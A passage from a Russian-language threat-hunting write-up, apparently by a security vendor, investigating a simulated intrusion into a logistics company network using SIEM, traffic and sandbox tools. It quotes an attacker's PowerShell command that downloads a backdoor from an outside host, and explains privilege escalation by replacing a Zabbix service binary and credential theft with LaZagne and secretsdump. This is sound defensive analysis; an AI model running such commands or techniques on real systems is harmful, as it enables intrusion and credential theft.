Рисунок 16. Сессия скачивания файла на iTop с управляющего сервера атакующих

PT NAD поможет ответить на вопрос, какая уязвимость была проэксплуатирована на iTop. Проанализировав сработавшие правила, мы выяснили, что используется уязвимая версия iTop 2.4.1, эксплойт к которой позволяет удаленно выполнить код (CVE-2018-10642). Можем определить название веб-шелла, который был использован атакующими, команды, которые они через него выполняли, и их вывод. Но самая важная информация — это адрес, с которого была произведена эксплуатация уязвимости, а именно узел comp-65.hv-logistics.stf (10.156.24.219).

Рисунок 17. Сработка правила PT NAD на эксплуатацию уязвимости в iTopРисунок 18. Заливка веб-шелла (PT NAD)Рисунок 19. Создание веб-шелла (MaxPatrol SIEM)

Получение учетных данных

Продолжаем наше расследование и перемещаемся на узел comp-65.hv-logistics.stf (10.156.24.219), с которого атакующие прорвались в серверный сегмент. Задав узкий промежуток времени, в котором была зафиксирована эксплуатация уязвимости, мы видим обращение на порт 80 сервиса iTop от 1.exe.

Рисунок 20. Обращения на порт 80 сервиса iTop во время эксплуатации уязвимости

Проверим, от имени какого пользователя был запущен процесс с предполагаемым эксплойтом. Очень важно проводить такой анализ, чтобы понять, какими правами обладает процесс, ведь права наследуются от пользователя. Если с пользователем SYSTEM все понятно, то по имени w_pitts мы не можем с ходу сказать, является ли он локальным администратором на узле comp-65.hv-logistics.stf (10.156.24.219). Один из способов это выяснить — проверить, регистрируются ли вместе со входом событие msgid = 4672 (присвоение специальных привилегий при входе). Мы не нашли таких событий, а значит, атакующим пришлось проявить изобретательность, чтобы получить максимальные права на узле.

Рисунок 21. Запуск 1.exe

Поищем происхождение файла 1.exe на comp-65.hv-logistics.stf (10.156.24.219) в MaxPatrol SIEM. Если посмотреть события в сессии w_pitts, то мы опять видим скачивание через PowerShell с использованием invoke-webrequest, где lg4.win был сохранен как 1.exe: Invoke-WebRequest -Uri http://lg4.ptsecurity.net/zhaya/lg4.win -OutFile C:\Users\Public\1.exe.

Рисунок 22. Скачивание 1.exe

Сам исполняемый файл мы можем вытащить из PT NAD и отправить на анализ в PT Sandbox. Поведенческий анализ свидетельствует о том, что 1.exe содержит бэкдор (рис. 23).

Рисунок 23. Поведенческий анализ lg4.win (1.exe)

Иногда бывает полезно анализировать не только строку запуска вредоносного файла, но и другие процессы, где он мог фигурировать как объект (мы сегодня уже делали так, чтобы выяснить, как файл был передан на узел). Но иногда можно увидеть и другие полезные для расследования события. Например, на скриншоте выше (рис. 23) видно, как атакующие подменили оригинальный исполняемый файл zabbix-agent.exe на полезную нагрузку — файл 1.exe. Проведя разведку на узле, хакеры обнаружили, что имеют права на запись в папку C:\Zabbix\bin\, где находится zabbix-agent.exe, который использует сервис Zabbix. Таким образом, при перезапуске службы атакующие получили обратное соединение на свой сервер и смогли исполнять команды на узле с правами SYSTEM.

Часто оказывается так, что у пользователя есть права на запись службы в папку, но нет прав на ее перезапуск. Тогда, если тип запуска службы — auto, можно просто перезагрузить узел. При старте системы службы начнут запускаться, и Zabbix запустит полезную нагрузку, а атакующие получат обратное соединение с уже такими желанными правами системы.

Конечно, в этом случае атакующие теряют из памяти lsass.exe пароли и хеши пользователей, которые ранее интерактивно входили на узел. А там могли быть учетные данные какого-нибудь администратора, которые полезны для дальнейшего продвижения по сети.

Рисунок 24. Замена оригинального файла zabbix_agent.exe на полезную нагрузку

Кстати, lsass.exe — далеко не единственное место, откуда можно извлечь учетные данные. Один из способов — это получить из реестра кэшированные доменные учетные данные. Последние десять доменных входов кэшируются для того, чтобы доменный пользователь мог войти в систему, если по какой-то причине контроллер домена недоступен. Извлекать эти данные умеет известный инструмент LaZagne: для этого сохраняются ветки реестра hklm\sam, hklm\system и hklm\security, что хорошо видно на скриншоте ниже.

Рисунок 25. Извлечение кэшированных учетных данных из реестра

Стоит сказать, что у LaZagne есть много функций, и инструмент может получать данные не только из реестра, но и из сохраненных паролей для подключения к сетям Wi-Fi, из паролей, сохраненных в браузерах, в файлах конфигураций. Кроме того, в LaZagne есть модуль Pypykatz — это интерпретация Mimikatz на языке Python.

Чтобы понять, какие учетные данные потенциально оказались в руках атакующих, мы проверяем пользователей, которые входили на узел в последнее время. Пользователь administrator нам неинтересен, он локальный, а вот r_flores_admin — это уже любопытно, так как мы видели, что он использовался для дальнейших атак.

Рисунок 26. Интерактивные входы на comp-65.hv-logistics.stf

Итак, нам в нашем расследовании осталось ответить всего на два вопроса:

  1. Как атакующие получили доступ на comp-65.hv-logistics.stf (10.156.24.219).
  2. Откуда были получены учетные данные пользователя e_puckett, которого использовали для входа на RDG.

Начнем со второго: этот вопрос сложнее и потребует от нас навыков настоящего третхантера. То есть нужно выдвинуть гипотезу, а затем ее проверить.

Предполагаем, что учетные данные e_puckett были сдамплены с какого-то узла. Значит, нам надо найти все узлы, на которые e_puckett осуществлял интерактивный вход (logon_type in [2,7,11,10]). Список состоит всего из одного узла — comp-187.hv.logistics.stf (10.156.24.3). Значит, посмотрим на все взаимодействия между ним и теми узлами, которые находятся под контролем атакующих. И. Это headshot! Мы видим сработавшее на удаленный дамп учетных данных правило. Если перейти к исходным событиям, то становится ясно, что использовался инструмент Impacket secretsdump (для него характерны сетевой вход, доступ к именованным каналам svcctl и winreg, сохранение результатов в файл со случайным именем и расширением .tmp в C:\Windows, а затем чтение этого файла по SMB).

На самом деле Threat Hunting далеко не всегда бывает таким быстрым и удачным, каким он оказался в этом примере. Перед этим нам пришлось cформулировать множество гипотез, и их проверка закончилась провалом. Мы искали, где атакующие завладели учетной записью e_puckett еще с того момента, когда впервые увидели ее использование на сервере RDG. В итоге раскручивание цепочки шаг за шагом привело нас к ответу. Сама атака была распределенная и заняла у команды атакующих трое суток, а вот на раскручивание цепочки нам суммарно потребовалось 8–10 часов.

Рисунок 27. Удаленный дамп паролей с узла comp-187.hv.logistics.stf

Точка входа

Вернемся к w_pitts. Мы помним, что файл 1.exe был создан процессом powershell.exe. Часто для понимания полной картины происходящего на узле приходится строить цепочку процессов, то есть искать событие за событием, сверяя PID и имена процессов. К счастью, MaxPatrol SIEM умеет это делать самостоятельно. Нужный нам процесс powershell.exe даже попал в цепочку для правила корреляции Malicious_Office_Document на вредоносный документ. Убедившись, что это именно тот самый powershell.exe, можно сделать вывод, что в 12:22 пользователь w_pitts получил фишинговое письмо и открыл вложение. Если посмотреть на цепочку, то видно, что пользователь запустил почтовый клиент, открыл вложение в виде DOC-файла, который запустил powershell.exe и начал выполнять команды.

Рисунок 28. Цепочка процессов, характерная для фишинговой рассылки вредоносного документа Microsoft Office

Это же письмо мы можем найти в PT Sandbox. Поведенческий анализ явно говорит о вредоносности вложения.

Рисунок 29. Анализ почтового вложения, проведенный PT Sandbox

Заключение

Давайте соберем все факты воедино и попробуем подвести итог расследования.

Атакующие отправили фишинговое письмо (якобы с резюме), которые было открыто сотрудником отдела кадров w_pitts, благодаря чему хакеры получили обратное соединение на свой C2-сервер. Быстро найдя способ повысить привилегии в системе, они получили учетные данные администратора r_flores_admin, что позволило им чувствовать себя очень свободно в инфраструктуре компании. Немного побродив по пользовательскому сегменту и получив контроль еще над парой учетных записей, нападающие поняли, что в этом сегменте крупной рыбы не поймаешь и надо двигаться дальше. Дверь в серверный сегмент им открыла не запатченная вовремя уязвимость в сервисе создания запросов в техподдержку iTop. Оттуда хакеры быстро переместились на сервер RDG, которому по протоколу удаленного рабочего стола (RDP) открыт доступ практически на любой узел любого сегмента. Воспользовавшись этим и даже не заглянув в сегмент администраторов, атакующие кинулись к системам SCADA реализовывать недопустимое событие.

Нужно было всего одно письмо, и понеслось: разведка, закрепление, повышение привилегий, горизонтальное перемещение — и вот атакующие уже в сегменте АСУ ТП управляют вашим телетрапом. Примерный их путь к реализации недопустимого события состоял из шести этапов (см. скриншот ниже).

Рисунок 30. Схема перемещения команды атакующих по сети транспортной компании Heavy Logistics

В реальной жизни наша основная задача — не давать атакующим возможности реализовывать недопустимые события и пресекать все их действия на этапе продвижения. При грамотном управлении процессами мониторинга и реагирования на инциденты информационной безопасности, а также при наличии эффективных правил обнаружения подобные атаки в компаниях могут быть обнаружены и остановлены уже на самом первом этапе — получении фишинговых писем.

Надеемся, наша статья поможет вам взглянуть на угрозы, процессы threat hunting и расследования под другим углом.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *